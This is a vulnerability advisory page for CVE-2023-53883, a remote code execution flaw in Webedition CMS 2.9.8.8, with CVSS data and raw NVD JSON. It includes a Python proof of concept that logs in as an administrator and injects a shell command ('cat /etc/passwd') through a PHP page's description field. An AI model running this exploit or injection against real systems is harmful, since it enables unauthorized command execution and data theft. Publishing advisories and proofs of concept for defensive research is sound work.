Security Vulnerability Report
中文
CVE-2023-53883 CVSS 7.2 HIGH

CVE-2023-53883

Published: 2025-12-15 21:15:51
Last Modified: 2025-12-18 21:44:51

Description

Webedition CMS v2.9.8.8 contains a remote code execution vulnerability that allows authenticated attackers to inject system commands through PHP page creation. Attackers can create a new PHP page with malicious system commands in the description field to execute arbitrary commands on the server.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:webedition:webedition_cms:2.9.8.8:*:*:*:*:*:*:* - VULNERABLE
Webedition CMS < 2.9.8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53883 PoC - Webedition CMS RCE via PHP Page Creation # Author: VulnCheck # Target: Webedition CMS v2.9.8.8 import requests import sys from bs4 import BeautifulSoup TARGET_URL = "http://target-website.com/webedition/" USERNAME = "admin" PASSWORD = "admin_password" def login(session, username, password): """Authenticate to Webedition CMS""" login_url = TARGET_URL + "we_login.php" login_data = { "username": username, "password": password } response = session.post(login_url, data=login_data) return "Login successful" in response.text or response.status_code == 200 def create_php_page_with_payload(session, payload): """Create PHP page with malicious command in description field""" page_url = TARGET_URL + "we_page_edit.php" # Payload injection in description field page_data = { "page_title": "Malicious Page", "page_type": "php", "page_description": f"Normal description; {payload};", "page_content": "<?php echo 'Test'; ?>", "save": "1" } response = session.post(page_url, data=page_data) return response.status_code == 200 def main(): session = requests.Session() # Step 1: Login with high-privilege account if not login(session, USERNAME, PASSWORD): print("[-] Login failed") sys.exit(1) print("[+] Login successful") # Step 2: Create PHP page with RCE payload # Example: Execute system command to read /etc/passwd payload = "cat /etc/passwd" if create_php_page_with_payload(session, payload): print("[+] Malicious PHP page created successfully") print(f"[*] Payload injected: {payload}") print("[*] Check server for command execution") else: print("[-] Failed to create malicious page") if __name__ == "__main__": main() # Note: This PoC demonstrates the vulnerability concept. # Actual exploitation requires valid high-privilege credentials. # Use responsibly and only on authorized systems.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53883", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:51.280", "lastModified": "2025-12-18T21:44:50.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Webedition CMS v2.9.8.8 contains a remote code execution vulnerability that allows authenticated attackers to inject system commands through PHP page creation. Attackers can create a new PHP page with malicious system commands in the description field to execute arbitrary commands on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webedition:webedition_cms:2.9.8.8:*:*:*:*:*:*:*", "matchCriteriaId": "A7A06534-7ECF-4DC7-BCF2-EAD8F9519E7B"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51661", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/webedition-cms-v-remote-code-execution-via-php-page-creation", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.webedition.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51661", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}